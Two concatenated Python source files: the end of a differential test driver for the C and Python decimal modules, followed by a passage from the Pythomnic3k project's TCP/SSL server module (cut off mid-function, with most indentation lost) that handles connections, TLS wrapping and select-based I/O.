t.presults.append(str(t.rp.real))
ctriple = None
if t.funcname not in ['__radd__', '__rmul__']: # see skip handler
try:
ctriple = c_as_triple(t.rc)
except ValueError:
try:
ptriple = p_as_triple(t.rp)
except ValueError:
pass
else:
raise RuntimeError("ValueError not raised")
else:
cres = c_from_triple(ctriple)
t.cresults.append(ctriple)
t.cresults.append(str(cres))
ptriple = p_as_triple(t.rp)
pres = p_from_triple(ptriple)
t.presults.append(ptriple)
t.presults.append(str(pres))
if t.with_maxcontext and isinstance(t.rmax, C.Decimal):
t.maxresults.append(t.rmax.to_eng_string())
t.maxresults.append(t.rmax.as_tuple())
t.maxresults.append(str(t.rmax.imag))
t.maxresults.append(str(t.rmax.real))
if ctriple is not None:
# NaN payloads etc. depend on precision and clamp.
if all_nan(t.rc) and all_nan(t.rmax):
t.maxresults.append(ctriple)
t.maxresults.append(str(cres))
else:
maxtriple = c_as_triple(t.rmax)
maxres = c_from_triple(maxtriple)
t.maxresults.append(maxtriple)
t.maxresults.append(str(maxres))
nc = t.rc.number_class().lstrip('+-s')
stat[nc] += 1
else:
# Results from e.g. __divmod__ can only be compared as strings.
if not isinstance(t.rc, tuple) and not isinstance(t.rp, tuple):
if t.rc != t.rp:
raise_error(t)
if t.with_maxcontext and not isinstance(t.rmax, tuple):
if t.rmax != t.rc:
raise_error(t)
stat[type(t.rc).__name__] += 1
# The return value lists must be equal.
if t.cresults != t.presults:
raise_error(t)
# The Python exception lists (TypeError, etc.) must be equal.
if t.cex != t.pex:
raise_error(t)
# The context flags must be equal.
if not t.context.assert_eq_status():
raise_error(t)
if t.with_maxcontext:
# NaN payloads etc. depend on precision and clamp.
if all_nan(t.rc) and all_nan(t.rmax):
return
# The return value lists must be equal.
if t.maxresults != t.cresults:
raise_error(t)
# The Python exception lists (TypeError, etc.) must be equal.
if t.maxex != t.cex:
raise_error(t)
# The context flags must be equal.
if t.maxcontext.flags != t.context.c.flags:
raise_error(t)
# ======================================================================
# Main test loops
#
# test_method(method, testspecs, testfunc) ->
#
# Loop through various context settings. The degree of
# thoroughness is determined by 'testspec'. For each
# setting, call 'testfunc'. Generally, 'testfunc' is itself
# a loop, iterating through many test cases generated
# by the functions in randdec.py.
#
# test_n-ary(method, prec, exp_range, restricted_range, itr, stat) ->
#
# 'test_unary', 'test_binary' and 'test_ternary' are the
# main test functions passed to 'test_method'. They deal
# with the regular cases. The thoroughness of testing is
# determined by 'itr'.
#
# 'prec', 'exp_range' and 'restricted_range' are passed
# to the test-generating functions and limit the generated
# values. In some cases, for reasonable run times a
# maximum exponent of 9999 is required.
#
# The 'stat' parameter is passed down to the 'verify'
# function, which records statistics for the result values.
# ======================================================================
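# Editor's note: illustrative sketch, not part of the original deccheck.py; it is
# never used by the driver. It only documents the shape of a single testspec
# dictionary as consumed by test_method() below; the real specs are assembled
# in the __main__ section at the bottom of the file.
def _example_testspec():
    return {
        'prec': [9],              # precisions to iterate over
        'expts': [(-383, 384)],   # (Emin, Emax) pairs, or ('rand', 'rand')
        'clamp': 'rand',          # 0, 1 or 'rand'
        'iter': 1,                # iterations per generator (None = default)
    }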
def log(fmt, args=None):
if args:
sys.stdout.write(''.join((fmt, '\n')) % args)
else:
sys.stdout.write(''.join((str(fmt), '\n')))
sys.stdout.flush()
def test_method(method, testspecs, testfunc):
"""Iterate a test function through many context settings."""
log("testing %s ...", method)
stat = defaultdict(int)
for spec in testspecs:
if 'samples' in spec:
spec['prec'] = sorted(random.sample(range(1, 101),
spec['samples']))
for prec in spec['prec']:
context.prec = prec
for expts in spec['expts']:
emin, emax = expts
if emin == 'rand':
context.Emin = random.randrange(-1000, 0)
context.Emax = random.randrange(prec, 1000)
else:
context.Emin, context.Emax = emin, emax
if prec > context.Emax: continue
log(" prec: %d emin: %d emax: %d",
(context.prec, context.Emin, context.Emax))
restr_range = 9999 if context.Emax > 9999 else context.Emax+99
for rounding in RoundModes:
context.rounding = rounding
context.capitals = random.randrange(2)
if spec['clamp'] == 'rand':
context.clamp = random.randrange(2)
else:
context.clamp = spec['clamp']
exprange = context.c.Emax
testfunc(method, prec, exprange, restr_range,
spec['iter'], stat)
log(" result types: %s" % sorted([t for t in stat.items()]))
def test_unary(method, prec, exp_range, restricted_range, itr, stat):
"""Iterate a unary function through many test cases."""
if method in UnaryRestricted:
exp_range = restricted_range
for op in all_unary(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
if not method.startswith('__'):
for op in unary_optarg(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_binary(method, prec, exp_range, restricted_range, itr, stat):
"""Iterate a binary function through many test cases."""
if method in BinaryRestricted:
exp_range = restricted_range
for op in all_binary(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
if not method.startswith('__'):
for op in binary_optarg(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_ternary(method, prec, exp_range, restricted_range, itr, stat):
"""Iterate a ternary function through many test cases."""
if method in TernaryRestricted:
exp_range = restricted_range
for op in all_ternary(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
if not method.startswith('__'):
for op in ternary_optarg(prec, exp_range, itr):
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_format(method, prec, exp_range, restricted_range, itr, stat):
"""Iterate the __format__ method through many test cases."""
for op in all_unary(prec, exp_range, itr):
fmt1 = rand_format(chr(random.randrange(0, 128)), 'EeGgn')
fmt2 = rand_locale()
for fmt in (fmt1, fmt2):
fmtop = (op[0], fmt)
t = TestSet(method, fmtop)
try:
if not convert(t, convstr=False):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
for op in all_unary(prec, 9999, itr):
fmt1 = rand_format(chr(random.randrange(0, 128)), 'Ff%')
fmt2 = rand_locale()
for fmt in (fmt1, fmt2):
fmtop = (op[0], fmt)
t = TestSet(method, fmtop)
try:
if not convert(t, convstr=False):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_round(method, prec, exprange, restricted_range, itr, stat):
"""Iterate the __round__ method through many test cases."""
for op in all_unary(prec, 9999, itr):
n = random.randrange(10)
roundop = (op[0], n)
t = TestSet(method, roundop)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def test_from_float(method, prec, exprange, restricted_range, itr, stat):
"""Iterate the __float__ method through many test cases."""
for rounding in RoundModes:
context.rounding = rounding
for i in range(1000):
f = randfloat()
op = (f,) if method.startswith("context.") else ("sNaN", f)
t = TestSet(method, op)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def randcontext(exprange):
c = Context(C.Context(), P.Context())
c.Emax = random.randrange(1, exprange+1)
c.Emin = random.randrange(-exprange, 0)
maxprec = 100 if c.Emax >= 100 else c.Emax
c.prec = random.randrange(1, maxprec+1)
c.clamp = random.randrange(2)
c.clear_traps()
return c
def test_quantize_api(method, prec, exprange, restricted_range, itr, stat):
"""Iterate the 'quantize' method through many test cases, using
the optional arguments."""
for op in all_binary(prec, restricted_range, itr):
for rounding in RoundModes:
c = randcontext(exprange)
quantizeop = (op[0], op[1], rounding, c)
t = TestSet(method, quantizeop)
try:
if not convert(t):
continue
callfuncs(t)
verify(t, stat)
except VerifyError as err:
log(err)
def check_untested(funcdict, c_cls, p_cls):
"""Determine untested, C-only and Python-only attributes.
Uncomment print lines for debugging."""
c_attr = set(dir(c_cls))
p_attr = set(dir(p_cls))
intersect = c_attr & p_attr
funcdict['c_only'] = tuple(sorted(c_attr-intersect))
funcdict['p_only'] = tuple(sorted(p_attr-intersect))
tested = set()
for lst in funcdict.values():
for v in lst:
v = v.replace("context.", "") if c_cls == C.Context else v
tested.add(v)
funcdict['untested'] = tuple(sorted(intersect-tested))
# for key in ('untested', 'c_only', 'p_only'):
# s = 'Context' if c_cls == C.Context else 'Decimal'
# print("\n%s %s:\n%s" % (s, key, funcdict[key]))
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog="deccheck.py")
group = parser.add_mutually_exclusive_group()
group.add_argument('--short', dest='time', action="store_const", const='short', default='short', help="short test (default)")
group.add_argument('--medium', dest='time', action="store_const", const='medium', default='short', help="medium test (reasonable run time)")
group.add_argument('--long', dest='time', action="store_const", const='long', default='short', help="long test (long run time)")
group.add_argument('--all', dest='time', action="store_const", const='all', default='short', help="all tests (excessive run time)")
group = parser.add_mutually_exclusive_group()
group.add_argument('--single', dest='single', nargs=1, default=False, metavar="TEST", help="run a single test")
group.add_argument('--multicore', dest='multicore', action="store_true", default=False, help="use all available cores")
args = parser.parse_args()
assert args.single is False or args.multicore is False
if args.single:
args.single = args.single[0]
# Set up the testspecs list. A testspec is simply a dictionary
# that determines the number of different contexts that 'test_method'
# will generate.
base_expts = [(C.MIN_EMIN, C.MAX_EMAX)]
if C.MAX_EMAX == 999999999999999999:
base_expts.append((-999999999, 999999999))
# Basic contexts.
base = {
'expts': base_expts,
'prec': [],
'clamp': 'rand',
'iter': None,
'samples': None,
}
# Contexts with small values for prec, emin, emax.
small = {
'prec': [1, 2, 3, 4, 5],
'expts': [(-1, 1), (-2, 2), (-3, 3), (-4, 4), (-5, 5)],
'clamp': 'rand',
'iter': None
}
# IEEE interchange format.
ieee = [
# DECIMAL32
{'prec': [7], 'expts': [(-95, 96)], 'clamp': 1, 'iter': None},
# DECIMAL64
{'prec': [16], 'expts': [(-383, 384)], 'clamp': 1, 'iter': None},
# DECIMAL128
{'prec': [34], 'expts': [(-6143, 6144)], 'clamp': 1, 'iter': None}
]
if args.time == 'medium':
base['expts'].append(('rand', 'rand'))
# 5 random precisions
base['samples'] = 5
testspecs = [small] + ieee + [base]
elif args.time == 'long':
base['expts'].append(('rand', 'rand'))
# 10 random precisions
base['samples'] = 10
testspecs = [small] + ieee + [base]
elif args.time == 'all':
base['expts'].append(('rand', 'rand'))
# All precisions in [1, 100]
base['samples'] = 100
testspecs = [small] + ieee + [base]
else: # --short
rand_ieee = random.choice(ieee)
base['iter'] = small['iter'] = rand_ieee['iter'] = 1
# 1 random precision and exponent pair
base['samples'] = 1
base['expts'] = [random.choice(base_expts)]
# 1 random precision and exponent pair
prec = random.randrange(1, 6)
small['prec'] = [prec]
small['expts'] = [(-prec, prec)]
testspecs = [small, rand_ieee, base]
check_untested(Functions, C.Decimal, P.Decimal)
check_untested(ContextFunctions, C.Context, P.Context)
if args.multicore:
q = Queue()
elif args.single:
log("Random seed: %d", RANDSEED)
else:
log("\n\nRandom seed: %d\n\n", RANDSEED)
FOUND_METHOD = False
def do_single(method, f):
global FOUND_METHOD
if args.multicore:
q.put(method)
elif not args.single or args.single == method:
FOUND_METHOD = True
f()
# Decimal methods:
for method in Functions['unary'] + Functions['unary_ctx'] + \
Functions['unary_rnd_ctx']:
do_single(method, lambda: test_method(method, testspecs, test_unary))
for method in Functions['binary'] + Functions['binary_ctx']:
do_single(method, lambda: test_method(method, testspecs, test_binary))
for method in Functions['ternary'] + Functions['ternary_ctx']:
name = '__powmod__' if method == '__pow__' else method
do_single(name, lambda: test_method(method, testspecs, test_ternary))
do_single('__format__', lambda: test_method('__format__', testspecs, test_format))
do_single('__round__', lambda: test_method('__round__', testspecs, test_round))
do_single('from_float', lambda: test_method('from_float', testspecs, test_from_float))
do_single('quantize_api', lambda: test_method('quantize', testspecs, test_quantize_api))
# Context methods:
for method in ContextFunctions['unary']:
do_single(method, lambda: test_method(method, testspecs, test_unary))
for method in ContextFunctions['binary']:
do_single(method, lambda: test_method(method, testspecs, test_binary))
for method in ContextFunctions['ternary']:
name = 'context.powmod' if method == 'context.power' else method
do_single(name, lambda: test_method(method, testspecs, test_ternary))
do_single('context.create_decimal_from_float',
lambda: test_method('context.create_decimal_from_float',
testspecs, test_from_float))
if args.multicore:
error = Event()
write_lock = Lock()
def write_output(out, returncode):
if returncode != 0:
error.set()
with write_lock:
sys.stdout.buffer.write(out + b"\n")
sys.stdout.buffer.flush()
def tfunc():
while not error.is_set():
try:
test = q.get(block=False, timeout=-1)
except Empty:
return
cmd = [sys.executable, "deccheck.py", "--%s" % args.time, "--single", test]
p = subprocess.Popen(cmd, stdout=PIPE, stderr=STDOUT)
out, _ = p.communicate()
write_output(out, p.returncode)
N = os.cpu_count()
t = N * [None]
for i in range(N):
t[i] = Thread(target=tfunc)
t[i].start()
for i in range(N):
t[i].join()
sys.exit(1 if error.is_set() else 0)
elif args.single:
if not FOUND_METHOD:
log("\nerror: cannot find method \"%s\"" % args.single)
EXIT_STATUS = 1
sys.exit(EXIT_STATUS)
else:
sys.exit(EXIT_STATUS)
|
protocol_tcp.py
|
#!/usr/bin/env python3
#-*- coding: iso-8859-1 -*-
################################################################################
#
# This module contains an implementation of a generic TCP-based request-response
# interface. It is used internally as a base for the specific application-level
# protocol interfaces, such as HTTP, and should therefore not be used directly,
# but through protocol-specific descendants, such as protocol_http.py.
#
# The module also contains a generic "resource" for sending/receiving data
# over TCP. Because it respects the request timeout and does not block, it is
# used in many other TCP-based resources as a low level send/receive facility.
#
# Both interface and resource support SSL as well as plain TCP.
#
# Pythomnic3k project
# (c) 2005-2019, Dmitry Dvoinikov <dmitry@targeted.org>
# Distributed under BSD license
#
###############################################################################
__all__ = [ "TcpInterface", "TcpResource" ]
###############################################################################
import threading; from threading import Event, Lock, current_thread
import select; from select import select, error as select_error
import socket; from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM, \
SOL_SOCKET, SO_REUSEADDR, error as socket_error
import io; from io import BytesIO
import os; from os import SEEK_CUR, path as os_path
import ssl; from ssl import wrap_socket, CERT_OPTIONAL, CERT_REQUIRED, CERT_NONE, \
SSLError, SSL_ERROR_WANT_WRITE, SSL_ERROR_WANT_READ, \
SSLContext, PROTOCOL_SSLv23, OP_NO_SSLv2, OP_NO_SSLv3
import random; from random import shuffle
if __name__ == "__main__": # add pythomnic/lib to sys.path
import os; import sys
main_module_dir = os.path.dirname(sys.modules["__main__"].__file__) or os.getcwd()
sys.path.insert(0, os.path.normpath(os.path.join(main_module_dir, "..", "..", "lib")))
import exc_string; from exc_string import exc_string
import typecheck; from typecheck import typecheck, callable, optional, one_of
import interlocked_queue; from interlocked_queue import InterlockedQueue
import pmnc.timeout; from pmnc.timeout import Timeout
import pmnc.threads; from pmnc.threads import HeavyThread
import pmnc.request; from pmnc.request import Request
###############################################################################
# this utility function returns a description
# of a connection for a given socket
def _cf(socket): # connection from
try:
return "connection from {0[0]:s}:{0[1]:d}".\
format(socket.getpeername())
except:
return "aborted connection" # should not throw
###############################################################################
# this utility function extracts common name
# field from ssl peer's certificate
def _peer_cn(s):
cert = s.getpeercert()
if cert:
for field in cert["subject"]:
if field[0][0] == "commonName":
return field[0][1]
return None
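# Editor's note (illustrative, not part of the original module): getpeercert()
# returns a dict whose "subject" entry is a tuple of RDNs, each RDN itself a
# tuple of (field, value) pairs, e.g.
#
#     {"subject": ((("commonName", "server.example.com"),), ...), ...}
#
# which is why _peer_cn() above inspects field[0][0] and field[0][1].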
###############################################################################
class TcpConnection:
"""
<TcpConnection>
An instance of this class is created for each TCP connection accepted by
the interface's listener thread. The I/O thread invokes that instance's
methods in response to network events such as data available on the socket.
The actual protocol-specific processing is done by a new handler instance,
created and owned by this instance, for each new request. The TCP connection
is kept alive for as long as the handler allows.
"""
@typecheck
def __init__(self, interface_name: str, socket, handler_factory: callable,
request_timeout: float):
self._interface_name = interface_name
self._socket, self._cf = socket, _cf(socket)
self._peer_ip = socket.getpeername()[0]
self._handler_factory = handler_factory
self._handler = None
self._request_timeout = request_timeout
self._go_active()
self._state = self._state_initialize
self._unwritten_data = None
socket = property(lambda self: self._socket)
expired = property(lambda self: self._timeout.expired)
request = property(lambda self: self._request)
idle = property(lambda self: self._idle)
###################################
def _go_idle(self, idle_timeout: float):
self._idle = True
self._timeout = Timeout(idle_timeout)
self._request = None
def _go_active(self):
self._idle = False
self._timeout = Timeout(self._request_timeout)
self._handler = self._handler_factory(self._handler)
self._request = None
###################################
"""
Each time the handler finishes parsing a network protocol request, a new
Pythomnic request is created and started. Similarly, whenever this connection
instance is discarded, either upon success or failure, the request is ended.
"""
def _request_parameters(self): # these are made separate methods to allow
return dict(auth_tokens = dict(peer_ip = self._peer_ip, # overriding them in SslConnection class
encrypted = False))
def _describe_request(self):
self._request.describe("TCP connection from {0:s}".format(self._peer_ip))
def _begin_request(self):
self._request = pmnc.interfaces.begin_request(
timeout = self._timeout.remain, interface = self._interface_name,
protocol = self._handler.protocol, parameters = self._request_parameters())
self._describe_request()
def _end_request(self, reason = None):
if self._request:
request, self._request = self._request, None
pmnc.interfaces.end_request(reason is None, request)
###################################
def _state_initialize(self): # this fake state performs the initial
self._state = self._state_read # dispatch of the connection just accepted
return "read"
###################################
def _recv(self):
return self._socket.recv(16384), "read"
def _state_read(self):
data, wait_state = self._recv()
if data: # some data received from the client
if self._idle:
self._go_active()
if self._handler.consume(data):
self._begin_request()
self._state = self._state_resume
return "enqueue"
else: # otherwise, keep reading
return wait_state
elif self._idle: # it's ok for the client to disconnect
self._state = None # between requests
return "close"
else:
raise Exception("unexpected eof")
###################################
"""
The actual processing of the parsed request is performed by the same handler
that parsed it (nobody else would know how to handle it). The process_tcp_request
method is invoked from wu_process_tcp_request by one of the main thread pool
threads, not by the I/O thread itself.
"""
def process_tcp_request(self):
self._handler.process_tcp_request()
###################################
def _state_resume(self): # this fake state performs the dispatch
self._state = self._state_write # of the connection with ready response
return "write"
###################################
def _send(self, data):
return self._socket.send(data)
def _state_write(self):
data = self._unwritten_data or \
self._handler.produce(16384) # the handler gives out a response
if data: # some data still needs to be sent
try:
sent = self._send(data)
except:
self._unwritten_data = data # this allows the send attempt to be retried
raise # if appropriate (see SslConnection class)
else:
self._unwritten_data = None
if sent > 0:
unsent = len(data) - sent
if unsent > 0:
self._handler.retract(unsent)
return "write"
else:
raise Exception("unexpected eof")
else:
self._end_request()
idle_timeout = self._handler.idle_timeout
if idle_timeout > 0.0: # if the connection is kept alive
self._go_idle(idle_timeout) # return to reading another request
self._state = self._state_read
return "read"
else: # gracefully close the connection
self._state = None
return "close"
###################################
def process(self): # this is a state switch
return self._state()
###################################
def close(self, reason): # this is called from I/O thread's
self._end_request(reason) # discard_socket procedure
try:
self._socket.close()
except:
if pmnc.log.debug:
pmnc.log.debug(exc_string()) # log and ignore
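# Editor's note: illustrative sketch, not part of the original module and not
# used anywhere. It spells out the handler contract that TcpConnection relies
# on, as inferred from the calls it makes (consume/process_tcp_request/produce/
# retract plus the protocol and idle_timeout attributes); the real handlers are
# supplied by protocol-specific modules such as protocol_http.py and may differ.
class _SketchEchoHandler:
    protocol = "sketch"            # reported when the Pythomnic request is begun
    idle_timeout = 0.0             # 0.0 = close the connection after one request
    def __init__(self, prev_handler):     # handler_factory(previous_handler)
        self._request = b""
        self._response = b""
        self._last_chunk = b""
    def consume(self, data):              # feed received bytes, return a truthy
        self._request += data             # value once a complete request is parsed
        return b"\n" in self._request
    def process_tcp_request(self):        # called from a worker thread
        self._response = self._request    # trivial "echo" processing
    def produce(self, n):                 # hand out up to n bytes of the response
        self._last_chunk = self._response[:n]
        self._response = self._response[n:]
        return self._last_chunk
    def retract(self, n):                 # push back the bytes that were not sent
        self._response = self._last_chunk[-n:] + self._response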
###############################################################################
def _wrap_socket(s, *, ssl_ciphers, ssl_protocol, ssl_server_hostname, ssl_ignore_hostname, **kwargs):
ssl_protocol = ssl_protocol or "TLSv1"
try:
ssl_version = getattr(ssl, "PROTOCOL_{0:s}".format(ssl_protocol))
except AttributeError:
raise Exception("the requested SSL/TLS protocol {0:s} "
"is not supported".format(ssl_protocol))
ssl_context = SSLContext(ssl_version)
if ssl_version == PROTOCOL_SSLv23:
ssl_context.options |= OP_NO_SSLv2
ssl_context.options |= OP_NO_SSLv3
if ssl_ciphers is not None:
ssl_context.set_ciphers(ssl_ciphers)
keyfile = kwargs.pop("keyfile", None)
certfile = kwargs.pop("certfile", None)
assert keyfile == certfile
if certfile:
ssl_context.load_cert_chain(certfile)
ca_certs = kwargs.pop("ca_certs")
ssl_context.load_verify_locations(ca_certs)
ssl_context.verify_mode = kwargs.pop("cert_reqs")
ssl_context.check_hostname = ssl_server_hostname is not None and not ssl_ignore_hostname
return ssl_context.wrap_socket(s,
do_handshake_on_connect = False,
server_hostname = ssl_server_hostname,
**kwargs)
###############################################################################
class SslConnection(TcpConnection):
"""
<SslConnection>
This class is a functionally equivalent descendant of TcpConnection.
It has a handful of methods overridden to support SSL transport.
"""
@typecheck
def __init__(self,
interface_name: str,
socket,
handler_factory: callable,
request_timeout: float,
ssl_key_cert_file: os_path.isfile,
ssl_ca_cert_file: os_path.isfile,
ssl_ciphers: optional(str),
ssl_protocol: optional(one_of("SSLv23", "TLSv1", "TLSv1_1", "TLSv1_2", "TLS")),
required_auth_level: one_of(CERT_REQUIRED, CERT_OPTIONAL, CERT_NONE)):
TcpConnection.__init__(self, interface_name, socket, handler_factory, request_timeout)
self._tcp_socket = self._socket
self._socket = _wrap_socket(self._tcp_socket, server_side = True, keyfile = ssl_key_cert_file,
certfile = ssl_key_cert_file, ca_certs = ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers, ssl_protocol = ssl_protocol,
ssl_server_hostname = None, ssl_ignore_hostname = True,
cert_reqs = required_auth_level)
self._socket.setblocking(False)
def _state_initialize(self): # this fake state performs the initial
self._state = self._state_handshake # dispatch of the connection just accepted
return "read"
def _state_handshake(self):
self._socket.do_handshake()
self._peer_cn = _peer_cn(self._socket) # this can be None if peer provided no certificate
if pmnc.log.debug:
cipher = self._socket.cipher()
if self._peer_cn:
pmnc.log.debug("{0:s} is encrypted ({1:s}) and authenticated ({2:s})".\
format(self._cf, cipher[0], self._peer_cn))
else:
pmnc.log.debug("{0:s} is encrypted ({1:s})".format(self._cf, cipher[0]))
self._state = self._state_read
return "read"
def _request_parameters(self):
request_parameters = TcpConnection._request_parameters(self)
auth_tokens = request_parameters["auth_tokens"]
auth_tokens.update(encrypted = True)
if self._peer_cn is not None:
auth_tokens.update(peer_cn = self._peer_cn)
return request_parameters
def _describe_request(self):
self._request.describe("SSL connection from {0:s}".format(self._peer_ip))
# receiving SSL data in non-blocking mode is ugly; for one, more data could
# have been received and buffered by the SSL socket than we may want to read,
# hence we have to keep reading while it is possible; for two, even though
# we are only reading, key renegotiation may occur which needs to write, hence
# WANT_WRITE case is possible; for three, we may encounter EOF while reading,
# and there is no way we can signal it to the caller without possibly losing
# the data already read; finally, we cannot keep reading indefinitely, so we have
# to protect ourselves against flooding by setting an arbitrary upper bound
_max_read_data = 1048576
def _recv(self):
data, data_len = [], 0
while data_len <= self._max_read_data: # prevent flooding, because the data read here is
try: # not seen by the handler in the course of reading
portion = self._socket.read(16384)
if portion:
data.append(portion)
data_len += len(portion)
else: # EOF from the client
wait_state = "read"
break
except SSLError as e:
if data: # if no data has been read, the exception is rethrown
if e.args[0] == SSL_ERROR_WANT_READ:
wait_state = "read"
break
elif e.args[0] == SSL_ERROR_WANT_WRITE:
wait_state = "write"
break
raise
else:
raise Exception("input size exceeded")
return b"".join(data), wait_state
def _send(self, data):
return self._socket.write(data)
def process(self): # this is a state switch
try:
return self._state()
except SSLError as e: # connection state remains the same,
if e.args[0] == SSL_ERROR_WANT_READ: # but the I/O wait state switches
return "read"
elif e.args[0] == SSL_ERROR_WANT_WRITE:
return "write"
else:
raise
###############################################################################
class TcpInterface: # called such so as not to be confused with "real" Interface's
"""
<TcpInterface>
This is a generic facility for implementing request-response protocols
over TCP or SSL. An instance of this class owns two threads - listener
thread and I/O thread. Listener thread accepts incoming TCP connections
and hands them over to the I/O thread. I/O thread performs all the network
processing in asynchronous mode (via select). The actual protocol details
are processed by the handlers created by the supplied handler_factory.
"""
@typecheck
def __init__(self,
name: str, # the name of the "real" interface
handler_factory: callable,
request_timeout: float,
*,
listener_address: (str, int),
max_connections: int,
ssl_key_cert_file: optional(os_path.isfile),
ssl_ca_cert_file: optional(os_path.isfile),
ssl_ciphers: optional(str),
ssl_protocol: optional(one_of("SSLv23", "TLSv1", "TLSv1_1", "TLSv1_2", "TLS")),
required_auth_level: optional(one_of(CERT_REQUIRED, CERT_OPTIONAL, CERT_NONE)) = CERT_OPTIONAL): # this parameter is only used in protocol_rpc.py
self._name = name
self._handler_factory = handler_factory
self._listener_address = listener_address
self._max_connections = max_connections
assert (ssl_key_cert_file is None and ssl_ca_cert_file is None) or \
(os_path.isfile(ssl_key_cert_file) and os_path.isfile(ssl_ca_cert_file)), \
"both certificate files must be specified or none of them"
self._ssl_key_cert_file = ssl_key_cert_file
self._ssl_ca_cert_file = ssl_ca_cert_file
self._ssl_ciphers = ssl_ciphers
self._ssl_protocol = ssl_protocol
self._use_ssl = ssl_key_cert_file is not None and ssl_ca_cert_file is not None
# create two sides of a UDP socket used for kicking
# I/O thread from blocking select
self._pulse_recv = socket(AF_INET, SOCK_DGRAM)
self._pulse_recv.bind(("127.0.0.1", 0))
self._pulse_recv_address = self._pulse_recv.getsockname()
self._pulse_send_lock = Lock()
self._pulse_send = socket(AF_INET, SOCK_DGRAM)
self._pulse_send.bind((self._pulse_recv_address[0], 0))
# create a queue used for delivering sockets to I/O thread
self._socket_queue = InterlockedQueue()
# select the appropriate class for connections
if self._use_ssl:
self._connection_factory = \
lambda socket: SslConnection(self._name, socket, self._handler_factory, request_timeout,
self._ssl_key_cert_file, self._ssl_ca_cert_file,
self._ssl_ciphers, self._ssl_protocol, required_auth_level)
else:
self._connection_factory = \
lambda socket: TcpConnection(self._name, socket, self._handler_factory, request_timeout)
# this Event when set prevents the I/O thread
# from enqueueing more requests
self._ceased = Event()
name = property(lambda self: self._name)
listener_address = property(lambda self: self._listener_address)
encrypted = property(lambda self: self._use_ssl)
###################################
def start(self):
# create and start the I/O thread
self._io = HeavyThread(target = self._io_proc,
name = "{0:s}:i/o".format(self._name))
self._io.start()
try: # create and start the listener thread
started_listening = Event()
self._listener = HeavyThread(target = self._listener_proc,
name = "{0:s}:lsn".format(self._name),
args = (started_listening, ))
self._listener.start()
# wait for the listener thread to actually start listening
try:
started_listening.wait(3.0) # this may end up waiting slightly less than 3 seconds, but that's ok
if not started_listening.is_set():
raise Exception("failed to start listening")
except:
self.cease()
raise
except:
self.stop()
raise
###################################
def cease(self):
self._ceased.set() # this prevents the I/O thread from introducing new requests
self._listener.stop() # (from keep-alives) and the listener thread is simply stopped
###################################
def stop(self):
self._io.stop()
###################################
def _push_socket_wake_io(self, socket, mode):
self._socket_queue.push((socket, mode))
# kick the I/O thread from its blocking select to hasten this socket processing
with self._pulse_send_lock:
self._pulse_send.sendto(b"\x00", 0, self._pulse_recv_address)
###################################
# this method is a work unit executed by one of the interface pool threads,
# it does the actual processing and resubmits the socket back to the I/O thread
# for sending the response back to the client
def wu_process_tcp_request(self, socket, connection):
try:
# see for how long the request was on the execution queue up to this moment
# and whether it has expired in the meantime, if it did there is no reason
# to proceed and we simply bail out
if pmnc.request.expired:
pmnc.log.error("request has expired and will not be processed")
reuse_mode = "timeout"
return # still goes through the finally section below
with pmnc.performance.request_processing():
connection.process_tcp_request()
except:
pmnc.log.error(exc_string())
reuse_mode = "error"
else:
reuse_mode = "reuse"
finally:
self._push_socket_wake_io(socket, reuse_mode)
###################################
# this single thread multiplexes all the I/O on the interface
def _io_proc(self):
# all the currently active connections are here, arranged in select-ready lists,
# alongside with the mapping of sockets to the protocol-specific connections
r_sockets, w_sockets, connections = [self._pulse_recv], [], {}
# this function unconditionally removes all traces of a socket,
# it is the last resort and presumably should not throw
def discard_socket(socket, reason = None):
try:
w_sockets.remove(socket) # the socket may be in
except ValueError: # |
try: # V
r_sockets.remove(socket) # at most one list
except ValueError:
pass
connection = connections.pop(socket, None)
if reason:
if connection and connection.idle:
if pmnc.log.debug:
pmnc.log.debug("gracefully closing {0:s}: {1:s}".format(_cf(socket), reason))
else:
if pmnc.log.debug:
pmnc.log.debug("discarding {0:s}: {1:s}".format(_cf(socket), reason))
else:
if pmnc.log.debug:
pmnc.log.debug("gracefully closing {0:s}".format(_cf(socket)))
if connection:
try:
connection.close(reason)
except:
if pmnc.log.debug:
pmnc.log.debug(exc_string()) # log and ignore
try:
socket.close()
except:
if pmnc.log.debug:
pmnc.log.debug(exc_string()) # log and ignore
# this function is called periodically and forcefully discards the sockets
# whose connections have expired; having this 3 second slack also helps in
# gracefully delivering the "deadline expired" kind of responses, although
# this is best effort and there is no guarantee such responses will be delivered
discard_timeout = Timeout(pmnc.request.self_test != "protocol_tcp" and 3.0 or 1.0)
def discard_expired_sockets():
if discard_timeout.expired:
try:
for socket, connection in list(connections.items()): # need to create a copy of connections
if connection.expired:
discard_socket(socket, "connection expired")
finally:
discard_timeout.reset()
# this function is called once at shutdown to terminate all idle
# persistent connections to prevent them from introducing more requests
idle_sockets_discarded = False
def discard_idle_sockets():
nonlocal idle_sockets_discarded
try:
for socket, connection in list(connections.items()): # need to create a copy of connections
if connection.idle:
discard_socket(socket, "interface shutdown")
finally:
idle_sockets_discarded = True
# this function selects sockets that can be read or written,
# also dealing with possible select failures
def select_rw_sockets(timeout):
while not timeout.expired:
try:
return select(r_sockets, w_sockets, [], timeout.remain)[0:2]
except (select_error, ValueError):
rs = []
for r_socket in r_sockets[:]: # need to create a copy of r_sockets
try:
if select([r_socket], [], [], 0.0)[0]:
